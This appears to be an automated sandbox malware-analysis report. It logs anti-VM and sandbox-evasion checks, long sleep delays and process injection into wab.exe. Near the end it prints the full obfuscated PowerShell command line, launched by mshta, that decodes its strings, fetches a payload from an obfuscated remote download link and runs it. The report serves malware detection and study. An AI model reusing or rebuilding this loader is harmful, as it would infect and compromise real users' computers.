Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: wab.exe, 00000008.00000002.3260035578.0000000020821000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 29E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 207F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 20670000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0293B927 rdtsc 1_2_0293B927
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6909 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2853 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6583
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3184
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3412 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5851 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2364 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5340 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5640 Thread sleep count: 6583 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7120 Thread sleep count: 3184 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2148 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -29514790517935264s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4024 Thread sleep count: 3412 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -99871s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4024 Thread sleep count: 5851 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -99748s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -99640s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -99529s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -99422s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -99312s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -99197s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -99078s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -98968s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -98846s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -98716s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -98608s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -98495s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -98307s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -98199s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -98093s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -97984s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -97875s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -97765s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -97652s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -97546s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -97437s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -97327s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -97218s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -97109s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96998s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96889s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96776s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96671s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96562s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96447s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96328s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96218s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96103s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -96000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -95890s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -95775s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -95672s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -95562s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -95449s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -95339s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -95234s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -95125s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -95015s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -94906s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4128 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99871 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99748 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99640 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99529 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99422 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99312 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99197 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99078 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98968 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98846 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98716 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98608 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98495 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98307 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98199 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98093 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97984 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97875 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97765 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97652 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97546 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97437 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97327 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97218 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97109 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96998 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96889 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96776 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96671 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96562 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96447 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96328 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96218 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96103 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 96000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95890 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95775 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95672 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95562 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95449 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95339 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95234 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95125 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 95015 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 94906 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wab.exe, 00000008.00000002.3260035578.0000000020821000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000001.00000002.2448479212.0000000006EE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz S
Source: mshta.exe, 00000000.00000003.2032211735.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wab.exe, 00000008.00000002.3245859914.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>?3V
Source: wab.exe, 00000008.00000002.3260035578.0000000020821000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: mshta.exe, 00000000.00000003.2032211735.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000003.00000002.3246478599.0000021BDE253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3245142520.0000021BD8C2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3245859914.0000000004C57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0293B927 rdtsc 1_2_0293B927
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_029E7189 LdrInitializeThunk, 8_2_029E7189
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00C31AE4 GetProcessHeap,HeapFree, 10_2_00C31AE4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00C33450 SetUnhandledExceptionFilter, 10_2_00C33450
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00C332C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00C332C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E80000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29EFEBC
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp Jump to behavior
